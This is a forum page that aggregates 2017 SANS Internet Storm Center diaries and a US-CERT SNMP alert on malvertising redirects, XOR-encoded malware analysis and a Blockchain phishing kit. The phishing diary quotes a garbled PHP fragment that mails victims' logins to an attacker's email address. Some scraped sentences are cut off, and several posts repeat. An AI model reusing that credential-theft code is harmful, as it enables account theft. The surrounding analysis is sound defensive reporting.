Baanboard.com

Go Back   Baanboard.com > News > RSS Newsfeeds > Categories

User login

Frontpage Sponsor

Main

Poll
For ERP LN feature pack upgrade, what method of install are you using?
Installation Wizard into existing VRC
34%
Installation Wizard into new VRC
41%
Manual into existing VRC
3%
Manual into new VRC
21%
Total votes: 29

Baanboard at LinkedIn


Reference Content

 
Security

ISC Stormcast For Monday, June 12th 2017 https://isc.sans.edu/podcastdetail.html?id=5538, (Mon, Jun 12th)

SANS Internet Storm Center - June 12, 2017 - 1:20am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

An Occasional Look in the Rear View Mirror, (Sat, Jun 10th)

SANS Internet Storm Center - June 10, 2017 - 2:01pm

With two new drivers in my home, I am training them to occasionally look in the rear view mirror of their car as an effective way to increase their situational awareness when driving. What if this principle were applied to the area of hardware and software inventory? Perhaps in the form of a quarterly reminder to consider CIS Critical Security Controls 1 and 2 that called for an objective look at hardware and software that might not be as shiny and new. Intentionally searching for this type of deferred maintenance could very well find unnecessary risk that is imposed on the entire organization.

Some organizations have an interestingapproach - for every new tool purchased, two tools must also be retired. What a novel section to include in the business justification for the next new tool. Take a look in the rear view mirror every once in a while - particularly at the area of technology retirement to make sure you dont just continue to increase the collection of tools. Who knows what might be discovered.

What grade would you give yourself in the discipline of technology retirement? Please leave what works for you in our comments section below.

Russell Eubanks

ISC Handler

SANS Instructor

@russelleubanks

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

An Occasional Look in the Rear View Mirror, (Sat, Jun 10th)

SANS Internet Storm Center - June 10, 2017 - 2:01pm

With two new drivers in my home, I am training them to occasionally look in the rear view mirror of their car as an effective way to increase their situational awareness when driving. What if this principle were applied to the area of hardware and software inventory? Perhaps in the form of a quarterly reminder to consider CIS Critical Security Controls 1 and 2 that called for an objective look at hardware and software that might not be as shiny and new. Intentionally searching for this type of deferred maintenance could very well find unnecessary risk that is imposed on the entire organization.

Some organizations have an interestingapproach - for every new tool purchased, two tools must also be retired. What a novel section to include in the business justification for the next new tool. Take a look in the rear view mirror every once in a while - particularly at the area of technology retirement to make sure you dont just continue to increase the collection of tools. Who knows what might be discovered.

What grade would you give yourself in the discipline of technology retirement? Please leave what works for you in our comments section below.

Russell Eubanks

ISC Handler

SANS Instructor

@russelleubanks

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Friday, June 9th 2017 https://isc.sans.edu/podcastdetail.html?id=5536, (Fri, Jun 9th)

SANS Internet Storm Center - June 9, 2017 - 2:25am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Friday, June 9th 2017 https://isc.sans.edu/podcastdetail.html?id=5536, (Fri, Jun 9th)

SANS Internet Storm Center - June 9, 2017 - 2:25am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Severity: Important VMware Horizon View Clien Patch https://www.vmware.com/security/advisories/VMSA-2017-0011.html, (Thu, Jun 8th)

SANS Internet Storm Center - June 9, 2017 - 1:01am

Tom Webb

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Severity: Important VMware Horizon View Clien Patch https://www.vmware.com/security/advisories/VMSA-2017-0011.html, (Thu, Jun 8th)

SANS Internet Storm Center - June 9, 2017 - 1:01am

Tom Webb

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Thursday, June 8th 2017 https://isc.sans.edu/podcastdetail.html?id=5534, (Thu, Jun 8th)

SANS Internet Storm Center - June 8, 2017 - 1:35am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Thursday, June 8th 2017 https://isc.sans.edu/podcastdetail.html?id=5534, (Thu, Jun 8th)

SANS Internet Storm Center - June 8, 2017 - 1:35am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Summer STEM for Kids, (Thu, Jun 8th)

SANS Internet Storm Center - June 8, 2017 - 1:19am

Its summertime and your little hackers need something to keep them busy! Let look at some of the options for kids to try out. Ive tried out each of these programs and have had good luck with them. Please post in comments any site you have been successful with your kids in teaching them STEM or IT Security. Ill keep this list up on my github https://github.com/tcw3bb/ISC_Posts/blob/master/Kids_Coding_Security_Resource.

Coding Options (4-7)

Scratch jr (app) http://pbskids.org/learn/scratchjr/

  • Is a gui application that easy to use building blocks to make programs. You will need to help your kids as there is no walk through within the app.

Coji (Robot and App) http://wowwee.com/coji

  • Coji is a robot where you use an app to move him around your house. The app also has games to teach you coding basics. A about half of the puzzle are too hard for him, but its fun.

Coding Options (7 and 12)

Scratch (PC) https://scratch.mit.edu/

  • Scratch is a application that allows you to code using building block. This version has more complex logic options.

Hour of code(PC). https://code.org/learn

  • Learn coding basics using a browser in about an hour per section. Lots of different themes to keep kids interested.

Made with code(PC) http://Madewithcode.com

  • Similar to hour of code but more slanted towards girls. Great for all thought.

Minecraft modding (PC) http://learntomod.com

  • They use building blocks like scratch to make Minecraft Mods. They have lots of options to play and learn watching videos for each learning objective and earn badges.

Scratch Books

Coding Games in Scratch (Jon Woodcock)

20 Games to Create with Scratch (Max Wainewright)

Scratch Coding Cards (Natalie Rusk)

  • These cards can be done on at a time, to do coding in little bites.

Electronics

Snap Circuits http://www.snapcircuits.net/

  • These are the replacement for the ScienceFair 150-in-1 projects I grew up with. Build simple electronics by snapping together electronic parts.

Makeblock http://www.makeblock.com/

  • Arduino kit that plugs into scratch . There a lots of cools project depending on what kits you have. I bought several when radio shack was closing in my area.

--

Tom Webb

@twsecblog

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Deceptive Advertisements: What they do and where they come from, (Wed, Jun 7th)

SANS Internet Storm Center - June 7, 2017 - 5:12pm

About a week ago, a reader asked for help with a nasty typo squatting incident:

The site, yotube.com, at the time redirected to fake tech support sites. These sites typically pop up a message alerting the user of a made-up problem and offer a phone number for tech support.

Investigating the site, I found ads, all of which can be characterized as deceptive. In addition to offering tech support, some of the ads offered video players for download or even suggested that the user has to log in to the site, offering a made up login form. If a user clicks on these ads, the user is sent to a number of different redirects. For example:

For example: (URL parameters removed to make this more readable)

hxxp://inclk.com/adServe/feedclick (URL the ad linked to)
hxxp://p185689.inclk.com/adServe/adClick
hxxp://wkee.reddhon.com/d7477cb3-70f0-4861-a578-a5b6ef73a167
hxxp://www.rainbow-networks.com/RBN3seB
hxxp://critical-system-failure8466.97pn76810224.error-notification-3.club/ (fake tech support page)

hxxp://inclk.com/adServe/banners
hxxp://inclk.com/adServe/banners/findBanner
hxxp://service.skybrock.com/serving/
hxxp://cdn.glisteningapples.pro/lp/

At the time, the ads were hosted at inclk.com. width:300px" />

Below this dialog, a hard to read disclaimer is displayed (I left the colors as is. width:300px" />

Virustotal identifies the resulting download as Adware. I didn width:300px" />

Now, these ads were after all displayed on my page, and I had an account set up with RevenueHits. So I decided to inquire about the deceptive ads I received:

I just started testing revenue hits, and all the ads I receive are downloads of fraudulent media players. Is there a way to filter these ads? Do you have a way to flag ads as inappropriate? thx.

The moment I submitted this request, I received the following (obviously automated) response:

JohannesUllrich

Your account was automatically banned by our system, due to fraudulent traffic sources.

Please notice that once our system mark your traffic as fraud, there is nothing I can do to change it

Please check again all you traffic sources.

Regards

Support team

The ads continued to be displayed on my site. A business day later, I received a manual reply to my initial question:

HiJohannes
Thank you for reaching out to us.

Our Design team is working these days on the diversity of our ads.

We are committed to achieve the highest performance as possible for you. Therefore, the ads you see today are the best performing ones on your traffic.

You can remove some of them from your site butnote that it might affect your results.

I still receive exclusively deceptive ads from RevenueHits. However, at least the results are not that bad. RevenueHits would pay me $0.36 for the one click through it counted. I haven-)

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Wednesday, June 7th 2017 https://isc.sans.edu/podcastdetail.html?id=5532, (Tue, Jun 6th)

SANS Internet Storm Center - June 7, 2017 - 12:55am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Malware and XOR - Part 2, (Tue, Jun 6th)

SANS Internet Storm Center - June 6, 2017 - 9:39pm

In part 1, I gave some examples to recover XOR keys from encoded executables if we knew some of the content of the unencoded file (known plaintext attack).

In this part, I give some examples to automate this process using my xor-kpa tool.

xor-kpa.py takes 2 files as input: the first file contains the plaintext, and the second file the encoded file. We are going to search for string This program cannot be run in DOS mode width:852px" />

xor-kpa displays some potential keys, in ascending order of extra characters.

Value Key is the recovered key, and Key (hex) is the hexadecimal representation of the key (in case the key would not be printable).

Keystream is the keystream, from which xor-kpa extracted the key by looking for repeating strings.

Extra is the difference between the length of the keystream and the length of the key. If this is just one character, the proposed key is very unlikely to be the encoding key. Output can be filtered by requiring a minimum value for extra by using option -e.

Divide is the number of times the key is present in the keystream.

And counts reports the number of times the same key was recovered at different positions in the encoded file.

So by using this known plaintext (This program cannot be run in DOS mode) with the encoded file, xor-kpa proposes a number of keys. In this example, the key with the highest number of extra characters is the actual encoding key (Password).

Another way to recover the key we saw yesterday, is looking for sequences of null bytes (0x00) which have been encoded. xor-kpa.py can do this too, by giving 000000000000... as plaintext. We could create a file containing null bytes, but it width:852px" />

The key was recovered, and the count is very high, so it width:852px" />

Please post a comment is you have ideas for other known plaintexts in executables.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Tuesday, June 6th 2017 https://isc.sans.edu/podcastdetail.html?id=5530, (Tue, Jun 6th)

SANS Internet Storm Center - June 6, 2017 - 1:35am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

TA17-156A: Reducing the Risk of SNMP Abuse

US-CERT - Alerts - June 6, 2017 - 1:11am
Original release date: June 05, 2017
Systems Affected

SNMP enabled devices

Overview

The Simple Network Management Protocol (SNMP) may be abused to gain unauthorized access to network devices. SNMP provides a standardized framework for a common language that is used for monitoring and managing devices in a network.

This Alert provides information on SNMP best practices, along with prevention and mitigation recommendations.

Description

SNMP depends on secure strings (or “community strings”) that grant access to portions of devices’ management planes. Abuse of SNMP could allow an unauthorized third party to gain access to a network device. 

SNMPv3 should be the only version of SNMP employed because SNMPv3 has the ability to authenticate and encrypt payloads. When either SNMPv1 or SNMPv2 are employed, an adversary could sniff network traffic to determine the community string. This compromise could enable a man-in-the-middle or replay attack.

Although SNMPv1 and SNMPv2 have similar characteristics, 64-bit counters were added to SNMPv2 so it could support faster interfaces. SNMPv3 replaces the simple/clear text password sharing used in SNMPv2 with more securely encoded parameters. All versions run over the User Datagram Protocol (UDP).

Simply using SNMPv3 is not enough to prevent abuse of the protocol. A safer approach is to combine SNMPv3 with management information base (MIB) whitelisting using SNMP views. This technique ensures that even with exposed credentials, information cannot be read from or written to the device unless the information is needed for monitoring or normal device re-configuration. The majority of devices that support SNMP contain a generic set of MIBs that are vendor agnostic. This approach allows the object identifier (OID) to be applied to devices regardless of manufacturer.

Impact

A remote attacker may abuse SNMP-enabled network devices to access an organization’s network infrastructure.

Solution

A fundamental way to enhance network infrastructure security is to safeguard networking devices with secure configurations. US-CERT recommends that administrators:

  • Configure SNMPv3 to use the highest level of security available on the device; this would be authPriv on most devices. authPriv includes authentication and encryption features, and employing both features enhances overall network security. Some older images may not contain the cryptographic feature set, in which case authNoPriv needs to be used. However, if the device does not support Version 3 authPriv, it should be upgraded.
  • Ensure administrative credentials are properly configured with different passwords for authentication and encryption. In configuring accounts, follow the principle of least privilege. Role separation between polling/receiving traps (reading) and configuring users or groups (writing) is imperative because many SNMP managers require login credentials to be stored on disk in order to receive traps.
  • Refer to your vendor’s guidance for implementing SNMP views. SNMP view is a command that can be used to limit the available OIDs. When OIDs are included in the view, all other MIB trees are inherently denied. The SNMP view command must be used in conjunction with a predefined list of MIB objects.
  • Apply extended access control lists (ACLs) to block unauthorized computers from accessing the device. Access to devices with read and/or write SNMP permission should be strictly controlled. If monitoring and change management are done through separate software, then they should be on separate devices.
  • Segregate SNMP traffic onto a separate management network. Management network traffic should be out-of-band; however, if device management must coincide with standard network activity, all communication occurring over that network should use some encryption capability. If the network device has a dedicated management port, it should be the sole link for services like SNMP, Secure Shell (SSH), etc.
  • Keep system images and software up-to-date.
References Revision History
  • June 5, 2017: Initial Release

This product is provided subject to this Notification and this Privacy & Use policy.


Categories: Security

TA17-156A: Reducing the Risk of SNMP Abuse

US-CERT - Alerts - June 6, 2017 - 1:11am
Original release date: June 05, 2017
Systems Affected

SNMP enabled devices

Overview

The Simple Network Management Protocol (SNMP) may be abused to gain unauthorized access to network devices. SNMP provides a standardized framework for a common language that is used for monitoring and managing devices in a network.

This Alert provides information on SNMP best practices, along with prevention and mitigation recommendations.

Description

SNMP depends on secure strings (or “community strings”) that grant access to portions of devices’ management planes. Abuse of SNMP could allow an unauthorized third party to gain access to a network device. 

SNMPv3 should be the only version of SNMP employed because SNMPv3 has the ability to authenticate and encrypt payloads. When either SNMPv1 or SNMPv2 are employed, an adversary could sniff network traffic to determine the community string. This compromise could enable a man-in-the-middle or replay attack.

Although SNMPv1 and SNMPv2 have similar characteristics, 64-bit counters were added to SNMPv2 so it could support faster interfaces. SNMPv3 replaces the simple/clear text password sharing used in SNMPv2 with more securely encoded parameters. All versions run over the User Datagram Protocol (UDP).

Simply using SNMPv3 is not enough to prevent abuse of the protocol. A safer approach is to combine SNMPv3 with management information base (MIB) whitelisting using SNMP views. This technique ensures that even with exposed credentials, information cannot be read from or written to the device unless the information is needed for monitoring or normal device re-configuration. The majority of devices that support SNMP contain a generic set of MIBs that are vendor agnostic. This approach allows the object identifier (OID) to be applied to devices regardless of manufacturer.

Impact

A remote attacker may abuse SNMP-enabled network devices to access an organization’s network infrastructure.

Solution

A fundamental way to enhance network infrastructure security is to safeguard networking devices with secure configurations. US-CERT recommends that administrators:

  • Configure SNMPv3 to use the highest level of security available on the device; this would be authPriv on most devices. authPriv includes authentication and encryption features, and employing both features enhances overall network security. Some older images may not contain the cryptographic feature set, in which case authNoPriv needs to be used. However, if the device does not support Version 3 authPriv, it should be upgraded.
  • Ensure administrative credentials are properly configured with different passwords for authentication and encryption. In configuring accounts, follow the principle of least privilege. Role separation between polling/receiving traps (reading) and configuring users or groups (writing) is imperative because many SNMP managers require login credentials to be stored on disk in order to receive traps.
  • Refer to your vendor’s guidance for implementing SNMP views. SNMP view is a command that can be used to limit the available OIDs. When OIDs are included in the view, all other MIB trees are inherently denied. The SNMP view command must be used in conjunction with a predefined list of MIB objects.
  • Apply extended access control lists (ACLs) to block unauthorized computers from accessing the device. Access to devices with read and/or write SNMP permission should be strictly controlled. If monitoring and change management are done through separate software, then they should be on separate devices.
  • Segregate SNMP traffic onto a separate management network. Management network traffic should be out-of-band; however, if device management must coincide with standard network activity, all communication occurring over that network should use some encryption capability. If the network device has a dedicated management port, it should be the sole link for services like SNMP, Secure Shell (SSH), etc.
  • Keep system images and software up-to-date.
References Revision History
  • June 5, 2017: Initial Release

This product is provided subject to this Notification and this Privacy & Use policy.


Categories: Security

Malware and XOR - Part 1, (Mon, Jun 5th)

SANS Internet Storm Center - June 5, 2017 - 11:01pm

Malware authors often encode their malicious payload, to avoid detection and make analysis more difficult.

I regurlarly see payloads encoded with the XOR function. Often, they will use a sequence of bytes as encoding key. For example, lets take Password as encoding key. Then the first byte of the payload is XORed with the first byte of the key (P), the second byte of the payload is XORed with the second byte of the key (a), and so on until all bytes of the key have been used. And then we start again with the first byte of the key: the ninth byte of the payload is XORed with the first byte of the key (P), ...

Let width:889px" />

So just by opening a XOR encoded PE file with a binary editor, we can see the repeating key, provided that the key is smaller than the sequences of 0x00 bytes.

Second interesting property of the XOR function: if you XOR the original file (cleartext) with the encoded file (ciphertext), you get the key (or to be more precise, the keystream).

Lets take another example. We know that in many PE files, you can find the string This program can not be run in DOS mode. width:882px" />

So if we have the encoded file, and the partially unencoded file, we can also recover the key, provided again that the key is smaller than the unencoded text, and that we know where to line-up the encoded and unencoded text.

In a next diary entry, I will show a tool to automate this analysis process.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Monday, June 5th 2017 https://isc.sans.edu/podcastdetail.html?id=5528, (Mon, Jun 5th)

SANS Internet Storm Center - June 5, 2017 - 1:25am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Phishing Campaigns Follow Trends, (Fri, Jun 2nd)

SANS Internet Storm Center - June 2, 2017 - 9:23am

Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields:

Internet actors Google, Yahoo!, Facebook, ... Software or manufacturers Apple, Microsoft, Adobe, ... Financial Services Paypal, BoA, name your preferred bank, ... Services DHL, eBay, ...

But the landscape of online services is ever changing and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time aphishing page trying to lure the Bitcoinoperator: BlockChain. Blockchain[1] is a key player in the management of width:600px" />

Hopefully, the webshellisn padding:5px 10px"> $from = From: b hacker@forever.org\n $from .= MIME-Version: 1.0\r\n $from .= charset=ISO-8859-1\r\n if(@$_GET[accedi]==login){ mail(carlosromero19871@gmail.com header( Location: richiesta_otp.html }else{

Note that the login procedure on BlockChain is extremely strong: 2FA authentication and one-time link is sent via email to approve all login attempts. Be sure that activate them if youre a BlockChain customer.

The fact that Bitcoins, the digital currency, is getting more and more popular makes it a new interesting target for attackers. And this is also the case in corporate environments: There is a trend in companies that make a reserve of Bitcoins to prevent possible Ransomware attacks![3]

[1] https://www.blockchain.com
[2]http://klimatika.com.ua/block/
[3]https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Friday, June 2nd 2017 https://isc.sans.edu/podcastdetail.html?id=5526, (Fri, Jun 2nd)

SANS Internet Storm Center - June 2, 2017 - 1:05am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

All times are GMT +2. The time now is 23:16.


©2001-2017 - Baanboard.com - Baanforums.com